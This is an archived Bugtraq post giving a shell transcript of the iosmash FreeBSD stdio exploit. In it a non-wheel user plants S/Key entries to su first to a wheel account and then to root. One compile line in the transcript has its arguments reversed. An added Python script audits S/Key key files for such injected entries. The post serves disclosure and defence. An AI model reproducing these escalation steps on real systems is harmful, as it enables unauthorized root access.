full info on iosmash.c as non wheel user

From: John Scimone (jscimone@cc.gatech.edu)
Date: 04/24/02


From: John Scimone <jscimone@cc.gatech.edu>
To: bugtraq@securityfocus.com
Date: Tue, 23 Apr 2002 22:25:36 +0000

from phased....

I didn't think such would be necessary, but due to the high volume of emails it
has proved so. Below is a transcript of exploiting the stdio bug on FreeBSD as
a user not in the wheel group.

Welcome to FreeBSD!
> id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
>
> grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx
>
> perl -pi -e 's/root /misterx /g' iosmash.c
> gcc -o iosmash.c iosmash
>./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
> grep 98 iosmash.c
  s/key 98 snosoft2
  98: MASS OAT ROLL TOOL AGO CAM
        "\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
> su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel), 1006(cvsusers)
%cd ~
%grep "root " iosmash.c
  decided to make a trivial exploit to easily get root :)
        "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#
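
For defenders, the key-file lines shown in the transcript are straightforward to audit for. The following is an added example, not part of the original post or of iosmash.c: it scans a dump of the S/Key key file (assumed to be /etc/skeykeys) and reports future timestamps, duplicate users, entries for privileged accounts, and lines that do not fit the layout. The field layout is assumed from the lines on the page; the function name, the `alice` entry and the stray line are constructed.

```python
import re
from datetime import datetime

# Field layout assumed from the injected line visible in the transcript:
# user, sequence, seed, 16-hex-digit key, "Mon DD,YYYY HH:MM:SS".
ENTRY = re.compile(
    r"^(?P<user>\S+) (?P<seq>\d{4}) (?P<seed>\S+)\s+"
    r"(?P<key>[0-9a-f]{16})\s+(?P<stamp>\w{3} \d{1,2},\d{4} \d{2}:\d{2}:\d{2})\s*$"
)

def audit_skeykeys(text, now, privileged=("root",)):
    """Return (line_no, user, reason) findings for a key-file dump."""
    findings, seen = [], {}
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        m = ENTRY.match(line)
        if m is None:
            findings.append((no, None, "malformed entry"))
            continue
        user = m["user"]
        try:
            stamp = datetime.strptime(m["stamp"], "%b %d,%Y %H:%M:%S")
        except ValueError:
            findings.append((no, user, "unparseable timestamp"))
            continue
        if stamp > now:
            findings.append((no, user, "timestamp in the future"))
        if user in seen:
            findings.append((no, user, f"duplicate of line {seen[user]}"))
        else:
            seen[user] = no
        if user in privileged:
            findings.append((no, user, "privileged account has an S/Key entry"))
    return findings

# Constructed sample: one ordinary entry, the two lines from the transcript,
# and one line that does not fit the layout.
SAMPLE = """\
alice 0042 ke1234           1f2e3d4c5b6a7988  Mar 02,2002 10:15:00
misterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03
root 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03
some stray diagnostic text
"""

if __name__ == "__main__":
    for finding in audit_skeykeys(SAMPLE, datetime(2002, 4, 24), ("root", "misterx")):
        print(finding)
```

Pass the members of wheel as `privileged` so that S/Key entries for accounts able to `su` are surfaced for review alongside root.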